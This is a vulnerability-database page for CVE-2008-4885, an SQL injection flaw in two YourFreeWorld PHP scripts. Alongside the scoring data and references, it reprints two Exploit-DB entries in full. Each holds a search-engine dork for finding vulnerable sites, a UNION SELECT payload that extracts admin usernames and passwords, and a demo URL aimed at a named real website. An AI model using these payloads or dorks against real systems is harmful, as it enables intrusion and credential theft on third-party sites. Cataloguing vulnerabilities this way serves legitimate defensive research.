CVE-2008-4885
published 2008-11-04CVE-2008-4885: SQL injection vulnerability in tr1.php in YourFreeWorld Scrolling Text Ads Script allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
59.9th percentile
SQL injection vulnerability in tr1.php in YourFreeWorld Scrolling Text Ads Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
YourFreeWorld Scrolling Text Ads - SQL Injection
exploitdb·2008-11-01
CVE-2008-4885 YourFreeWorld Scrolling Text Ads - SQL Injection
YourFreeWorld Scrolling Text Ads - SQL Injection
---
Scrolling Text Ads ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/scrollingads.php
DorK : inurl:"tr1.php?id="
Exploit :
tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
Demo :
http://www.downlinegoldmine.com/scrollingtextads/tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
Greetz : All my freind
# milw0rm.com [2008-11-01]
Exploit-DB
YourFreeWorld Short Url & Url Tracker - SQL Injection
exploitdb·2008-11-01
CVE-2008-4885 YourFreeWorld Short Url & Url Tracker - SQL Injection
YourFreeWorld Short Url & Url Tracker - SQL Injection
---
Short Url & Url Tracker ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/shorturl.php
DorK : inurl:"tr.php?id=" Short Url & Url Tracker
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Demo :
http://www.safelistadtrading.com/shorturl/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Greetz : All my freind
# milw0rm.com [2008-11-01]
No writeups or analysis indexed.
http://osvdb.org/49597http://securityreason.com/securityalert/4541http://www.securityfocus.com/bid/32060http://www.vupen.com/english/advisories/2008/2983https://www.exploit-db.com/exploits/6942http://osvdb.org/49597http://securityreason.com/securityalert/4541http://www.securityfocus.com/bid/32060http://www.vupen.com/english/advisories/2008/2983https://www.exploit-db.com/exploits/6942
2008-11-04
Published